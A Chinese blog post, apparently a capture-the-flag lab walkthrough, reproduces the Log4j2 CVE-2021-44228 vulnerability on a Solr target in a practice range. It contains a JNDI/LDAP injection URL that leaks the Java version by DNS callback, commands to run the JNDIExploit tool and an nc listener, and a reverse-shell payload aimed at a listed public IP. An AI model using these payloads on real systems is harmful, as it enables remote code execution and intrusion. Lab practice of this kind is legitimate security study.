尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

Log4j2 CVE-2021-44228 漏洞复现

Log4j2 CVE-2021-44228 漏洞复现
📅 发布时间:2026/6/17 20:40:42

环境搭建

直接使用极核GetShell靶场
https://hackhub.get-shell.com/
image

靶场
image

Solar系统存在漏洞路径可以传参

http://domain/solr/admin/cores?action=
${jndi:ldap://${sys:java.version}.example.com}

这里将domain和dns替换上去

http://node.hackhub.get-shell.com:56625/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.uzxnhvbvx0qf9z7jf6ng8sld64cw0poe.oastify.com}

看到版本已经被带出,证明存在漏洞
image

image

漏洞利用
利用JNDI注入工具:JNDIExploit 进行注入,在一个拥有公网IP的服务器上运行此工具(建议使用JDK8),命令:java -jar JNDIExploit-1.3-SNAPSHOT.jar -i <出口IP>
使用NC开启监听12345端口

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i -u
nc -lvvp 12345

image
image

利用JNDI注入工具的反弹Shell功能,访问URL

http://domian/solr/admin/cores?action=${jndi:ldap://<JNDI服务端IP>:1389/Basic/ReverseShell/<nc监听的IP>/<nc监听的端口>}

替换成我对的payload

http://node.hackhub.get-shell.com:56625/solr/admin/cores?action=${jndi:ldap://120.48.99.160:1389/Basic/ReverseShell/120.48.99.160/12345}

成功反弹shell
image

如果用vps的话,记得放开安全组,我这里做了两遍,一开始做的有问题,后来才想起来安全组没放

相关新闻

  • TeX 的 ctex 宏包的基本用法
  • 原子操作并不能保证数值的准确与一致性
  • mybatis-plus引入

最新新闻

  • Claude 3.5 Sonnet实战指南:代码生成与RAG优化
  • 高效图像标注实战指南:5步掌握make-sense专业标注流程
  • JMeter性能测试实战指南:从核心概念到分布式压测与结果分析
  • 豆包提示词四步转化法:从模糊需求到可执行AI协作协议
  • PowerPC指令集架构解析与MPC857T处理器应用实践
  • Pytest+YAML数据驱动:构建高效可维护的接口自动化测试框架

日新闻

  • 2026年不锈钢卷板厂家推荐排行榜:冷轧热轧/304/201不锈钢卷板,高颜值耐腐蚀源头厂家实力精选 - 企业推荐官【官方】
  • FLUX.1-dev FP8模型实战指南:24GB以下显卡高效部署方案
  • 2026佛山长途搬家价目表:跨省跨市搬家费用完整计算指南 - 从来都是英雄出少年

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号